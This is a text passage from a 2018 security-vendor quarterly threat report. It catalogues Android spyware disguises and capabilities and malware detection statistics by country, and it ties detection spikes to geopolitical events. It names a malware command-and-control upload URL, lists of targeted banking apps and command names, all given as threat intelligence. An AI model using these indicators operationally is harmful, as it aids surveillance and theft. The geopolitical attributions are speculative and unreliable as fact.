If the victim is a CEO politician or other VIP the content of the mobile device can be sold at the highest prices Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims Of course not only cybercriminals hunt for smartphone content Intelligence agencies and business competitors want to know everything about their targets Add jealous spouses tracking every move of their partners and parents wanting to control their children and you will easily understand why Android-oriented malware is a growing business
Today spying is the number one purpose of the Android malware In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them You can see the whole family of these digital spooks on the graph
The digital spooks
Global Threat Report Q2 2018 Edition
Page 27 of 73
Like real-world spies digital agents impersonate legitimate entities pretending to innocent applications or hiding malicious code inside legitimate software Like real spies they seek to remain invisible and constantly change disguises to avoid detection and hone their tradecraft from version to version
411 KevDroid The first is named KevDroid Itrsquos distributed in three versions
Version-1 Naver Defender
Version-2 Netease Defender
Version-3
PU
Disguises of KevDroid
The first version disguised as the Naver Defender application covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection This sample has multifunctional abilities for spying It steals account details contacts id name phone numbers and email address of the owner It grabs SMS messages and associated info It attempts to read call logs (number name type duration) emails (email type) and photos of the contacts After extracting all the data the malware encrypts it with ldquoAESrdquo algorithm and send to the attackersrsquo server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victimrsquos every phone call then encrypts and uploads it to the cybercriminalsrsquo server In addition it collects information about currently running services installed apps and the launcher name
The second version Netease Defender has additional spying abilities It takes control over the device camera and covertly records the victimrsquos activity Then it sends the video to the attackersrsquo server
Version-3 of KevDroid makes photos records call and creates a list of files on the device Also it extracts the web history account and contact details and the device information
People assume they are safe if they download apps exclusively from the official Google Play store This wrong assumption can be costly the first version of Desert Scorpion spyware was spread via official Google Play Services The spyware was camouflaged as a chat called Dardesh Instant App But when a user downloaded and ran it the app covertly connected to
Global Threat Report Q2 2018 Edition
Page 28 of 73
cybercriminalsrsquo Command and Control server and downloaded the spyware on the device From that moment the spyware constantly kept track of all events on the infected device Another means of the malware dissemination was social networks
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device
Global Threat Report Q2 2018 Edition
Page 29 of 73
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to Command amp Control server
Upload image files
Collect information about the application installed
Collect browserrsquos data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
